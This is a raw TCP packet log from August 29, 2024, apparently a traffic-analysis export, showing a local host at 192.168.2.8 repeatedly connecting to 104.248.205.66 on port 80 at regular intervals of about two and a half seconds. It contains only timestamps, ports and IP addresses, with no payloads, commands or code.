Aug 29, 2024 12:03:24.159802914 CEST	49732	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:24.159892082 CEST	49732	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:24.303271055 CEST	49733	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:24.308134079 CEST	80	49733	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:24.308231115 CEST	49733	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:24.310172081 CEST	49733	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:24.315135956 CEST	80	49733	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:24.315193892 CEST	49733	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:24.319952011 CEST	80	49733	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:26.573676109 CEST	80	49733	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:26.573699951 CEST	80	49733	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:26.573713064 CEST	80	49733	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:26.573731899 CEST	80	49733	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:26.573741913 CEST	49733	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:26.573771954 CEST	49733	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:26.573796988 CEST	49733	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:26.578594923 CEST	80	49733	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:26.708180904 CEST	49734	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:26.713042974 CEST	80	49734	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:26.713208914 CEST	49734	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:26.715199947 CEST	49734	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:26.719938040 CEST	80	49734	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:26.720005035 CEST	49734	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:26.724766970 CEST	80	49734	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:29.124326944 CEST	80	49734	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:29.124345064 CEST	80	49734	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:29.124352932 CEST	80	49734	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:29.124366045 CEST	80	49734	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:29.124409914 CEST	49734	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:29.124443054 CEST	80	49734	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:29.124454021 CEST	49734	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:29.124490976 CEST	49734	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:29.125849962 CEST	49734	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:29.269892931 CEST	49735	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:29.274893999 CEST	80	49735	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:29.274987936 CEST	49735	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:29.277251005 CEST	49735	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:29.282052040 CEST	80	49735	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:29.282131910 CEST	49735	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:29.286957979 CEST	80	49735	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:31.572973967 CEST	80	49735	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:31.572997093 CEST	80	49735	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:31.573010921 CEST	80	49735	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:31.573024035 CEST	80	49735	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:31.573054075 CEST	49735	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:31.573101997 CEST	49735	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:31.573153019 CEST	49735	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:31.577965975 CEST	80	49735	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:31.827536106 CEST	49736	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:31.832539082 CEST	80	49736	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:31.832659006 CEST	49736	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:31.845665932 CEST	49736	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:31.850586891 CEST	80	49736	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:31.850642920 CEST	49736	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:31.855458975 CEST	80	49736	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:34.162789106 CEST	80	49736	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:34.162826061 CEST	80	49736	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:34.162837982 CEST	80	49736	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:34.162854910 CEST	80	49736	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:34.162883997 CEST	80	49736	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:34.162895918 CEST	49736	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:34.162941933 CEST	49736	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:34.199024916 CEST	49736	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:34.462212086 CEST	49737	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:34.467190027 CEST	80	49737	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:34.467283964 CEST	49737	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:34.478476048 CEST	49737	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:34.483385086 CEST	80	49737	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:34.483481884 CEST	49737	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:34.488296986 CEST	80	49737	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:37.353600979 CEST	80	49737	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:37.353660107 CEST	80	49737	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:37.353672028 CEST	80	49737	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:37.353713989 CEST	49737	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:37.353765965 CEST	49737	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:37.353790045 CEST	80	49737	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:37.353830099 CEST	49737	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:37.358614922 CEST	80	49737	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:37.489311934 CEST	49738	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:37.494208097 CEST	80	49738	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:37.494293928 CEST	49738	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:37.498574018 CEST	49738	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:37.503407001 CEST	80	49738	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:37.503478050 CEST	49738	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:37.508243084 CEST	80	49738	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:39.972309113 CEST	80	49738	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:39.972330093 CEST	80	49738	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:39.972342014 CEST	80	49738	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:39.972357035 CEST	80	49738	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:39.972409010 CEST	80	49738	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:39.972477913 CEST	49738	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:39.972532034 CEST	49738	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:39.972532034 CEST	49738	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:39.977391958 CEST	80	49738	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:40.126370907 CEST	49740	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:40.131270885 CEST	80	49740	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:40.131340981 CEST	49740	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:40.133356094 CEST	49740	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:40.138614893 CEST	80	49740	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:40.138811111 CEST	49740	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:40.144639015 CEST	80	49740	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:42.412266970 CEST	80	49740	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:42.412292957 CEST	80	49740	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:42.412311077 CEST	80	49740	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:42.412381887 CEST	49740	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:42.412488937 CEST	49740	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:42.413048029 CEST	80	49740	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:42.413101912 CEST	49740	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:42.417330027 CEST	80	49740	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:42.551757097 CEST	49741	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:42.556766987 CEST	80	49741	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:42.556853056 CEST	49741	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:42.558893919 CEST	49741	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:42.563710928 CEST	80	49741	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:42.563781977 CEST	49741	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:42.574203014 CEST	80	49741	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:44.843158960 CEST	80	49741	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:44.843204975 CEST	80	49741	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:44.843223095 CEST	80	49741	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:44.843233109 CEST	80	49741	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:44.843250036 CEST	49741	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:44.843297005 CEST	49741	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:44.843347073 CEST	49741	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:44.848104954 CEST	80	49741	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:44.991739035 CEST	49742	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:44.996680975 CEST	80	49742	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:44.996793985 CEST	49742	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:44.998846054 CEST	49742	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:45.003763914 CEST	80	49742	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:45.003824949 CEST	49742	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:45.008805037 CEST	80	49742	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:47.407938957 CEST	80	49742	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:47.407955885 CEST	80	49742	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:47.407968044 CEST	80	49742	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:47.407979965 CEST	80	49742	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:47.407991886 CEST	80	49742	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:47.408066988 CEST	80	49742	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:47.408083916 CEST	49742	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:47.408143044 CEST	49742	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:47.408143044 CEST	49742	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:47.409490108 CEST	49742	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:47.409490108 CEST	49742	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:47.551649094 CEST	49743	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:47.556566000 CEST	80	49743	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:47.556663036 CEST	49743	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:47.559128046 CEST	49743	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:47.563915014 CEST	80	49743	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:47.563971996 CEST	49743	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:47.568736076 CEST	80	49743	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:49.848041058 CEST	80	49743	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:49.848073959 CEST	80	49743	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:49.848088980 CEST	80	49743	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:49.848264933 CEST	49743	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:49.848385096 CEST	49743	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:49.848653078 CEST	80	49743	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:49.848712921 CEST	49743	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:49.853431940 CEST	80	49743	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:49.991072893 CEST	49744	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:49.996126890 CEST	80	49744	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:49.996221066 CEST	49744	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:49.998919010 CEST	49744	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:50.004334927 CEST	80	49744	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:50.004455090 CEST	49744	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:50.009538889 CEST	80	49744	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:52.278361082 CEST	80	49744	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:52.278381109 CEST	80	49744	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:52.278399944 CEST	80	49744	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:52.278438091 CEST	80	49744	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:52.278450966 CEST	80	49744	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:52.278472900 CEST	49744	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:52.278536081 CEST	49744	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:52.278573036 CEST	49744	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:52.431170940 CEST	49745	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:52.436158895 CEST	80	49745	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:52.436240911 CEST	49745	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:52.438359976 CEST	49745	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:52.443331957 CEST	80	49745	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:52.443389893 CEST	49745	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:52.448288918 CEST	80	49745	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:54.762449980 CEST	80	49745	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:54.762466908 CEST	80	49745	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:54.762478113 CEST	80	49745	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:54.762511969 CEST	49745	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:54.762559891 CEST	80	49745	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:54.762593985 CEST	49745	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:54.762681961 CEST	49745	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:54.767590046 CEST	80	49745	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:54.896966934 CEST	49746	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:54.901905060 CEST	80	49746	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:54.902025938 CEST	49746	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:54.909610987 CEST	49746	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:54.915576935 CEST	80	49746	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:54.915657997 CEST	49746	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:54.921336889 CEST	80	49746	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:57.235742092 CEST	80	49746	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:57.235768080 CEST	80	49746	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:57.235780001 CEST	80	49746	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:57.235791922 CEST	80	49746	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:57.235848904 CEST	49746	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:57.235889912 CEST	49746	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:57.240897894 CEST	80	49746	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:57.381670952 CEST	49747	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:57.386543989 CEST	80	49747	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:57.386655092 CEST	49747	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:57.388792038 CEST	49747	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:57.393812895 CEST	80	49747	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:57.393910885 CEST	49747	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:57.398768902 CEST	80	49747	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:59.722035885 CEST	80	49747	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:59.722048998 CEST	80	49747	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:59.722059011 CEST	80	49747	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:59.722091913 CEST	80	49747	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:59.722183943 CEST	49747	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:59.722242117 CEST	49747	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:59.722261906 CEST	49747	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:59.727061033 CEST	80	49747	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:59.866991043 CEST	49748	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:59.871907949 CEST	80	49748	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:59.872014046 CEST	49748	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:59.874196053 CEST	49748	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:59.878984928 CEST	80	49748	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:59.879049063 CEST	49748	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:59.883819103 CEST	80	49748	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:02.225591898 CEST	80	49748	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:02.225614071 CEST	80	49748	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:02.225626945 CEST	80	49748	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:02.225640059 CEST	80	49748	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:02.225701094 CEST	49748	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:02.225745916 CEST	49748	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:02.225745916 CEST	49748	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:02.230549097 CEST	80	49748	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:02.365011930 CEST	49749	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:02.370650053 CEST	80	49749	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:02.370735884 CEST	49749	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:02.372833014 CEST	49749	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:02.379559994 CEST	80	49749	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:02.379636049 CEST	49749	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:02.384470940 CEST	80	49749	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:04.631860018 CEST	80	49749	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:04.631895065 CEST	80	49749	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:04.631906033 CEST	80	49749	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:04.631911993 CEST	80	49749	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:04.631952047 CEST	80	49749	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:04.631989002 CEST	49749	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:04.632028103 CEST	49749	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:04.632028103 CEST	49749	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:04.770921946 CEST	49750	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:04.775923967 CEST	80	49750	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:04.776036024 CEST	49750	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:04.778196096 CEST	49750	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:04.783193111 CEST	80	49750	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:04.783248901 CEST	49750	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:04.788122892 CEST	80	49750	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:07.063370943 CEST	80	49750	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:07.063405991 CEST	80	49750	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:07.063419104 CEST	80	49750	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:07.063431025 CEST	80	49750	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:07.063527107 CEST	49750	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:07.092418909 CEST	49750	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:07.097187042 CEST	80	49750	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:07.238388062 CEST	49751	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:07.243288040 CEST	80	49751	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:07.243379116 CEST	49751	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:07.245456934 CEST	49751	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:07.250397921 CEST	80	49751	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:07.250483036 CEST	49751	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:07.255613089 CEST	80	49751	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:09.482350111 CEST	80	49751	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:09.482382059 CEST	80	49751	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:09.482393980 CEST	80	49751	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:09.482405901 CEST	80	49751	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:09.482496023 CEST	49751	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:09.482541084 CEST	49751	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:09.482757092 CEST	80	49751	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:09.482805967 CEST	49751	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:09.552793026 CEST	49751	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:09.880609035 CEST	49752	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:09.886750937 CEST	80	49752	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:09.886822939 CEST	49752	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:09.888953924 CEST	49752	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:09.894942999 CEST	80	49752	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:09.894994974 CEST	49752	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:09.900964022 CEST	80	49752	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:12.157613993 CEST	80	49752	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:12.157633066 CEST	80	49752	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:12.157644987 CEST	80	49752	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:12.157653093 CEST	80	49752	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:12.157674074 CEST	80	49752	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:12.157743931 CEST	49752	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:12.157785892 CEST	49752	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:12.157849073 CEST	49752	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:12.540158987 CEST	49753	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:12.544996023 CEST	80	49753	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:12.545099020 CEST	49753	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:12.547591925 CEST	49753	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:12.552369118 CEST	80	49753	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:12.552431107 CEST	49753	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:12.557229042 CEST	80	49753	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:14.839831114 CEST	80	49753	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:14.839951038 CEST	80	49753	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:14.840104103 CEST	49753	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:14.840116024 CEST	80	49753	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:14.840217113 CEST	49753	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:14.840281010 CEST	80	49753	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:14.840404987 CEST	49753	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:14.846159935 CEST	80	49753	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:15.279000044 CEST	49754	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:15.284693003 CEST	80	49754	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:15.284847021 CEST	49754	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:15.288630962 CEST	49754	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:15.293437004 CEST	80	49754	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:15.293513060 CEST	49754	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:15.298286915 CEST	80	49754	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:17.573535919 CEST	80	49754	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:17.573556900 CEST	80	49754	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:17.573570013 CEST	80	49754	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:17.573582888 CEST	80	49754	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:17.573600054 CEST	80	49754	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:17.573611975 CEST	49754	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:17.573647022 CEST	49754	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:17.573647022 CEST	49754	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:17.573699951 CEST	49754	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:17.707986116 CEST	49755	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:17.712866068 CEST	80	49755	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:17.712968111 CEST	49755	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:17.715063095 CEST	49755	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:17.720088959 CEST	80	49755	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:17.720150948 CEST	49755	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:04:17.725044012 CEST	80	49755	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:19.961350918 CEST	80	49755	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:19.961375952 CEST	80	49755	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:19.961385965 CEST	80	49755	104.248.205.66	192.168.2.8
Aug 29, 2024 12:04:19.961400032 CEST	80	49755	104.248.205.66	192.168.2.8
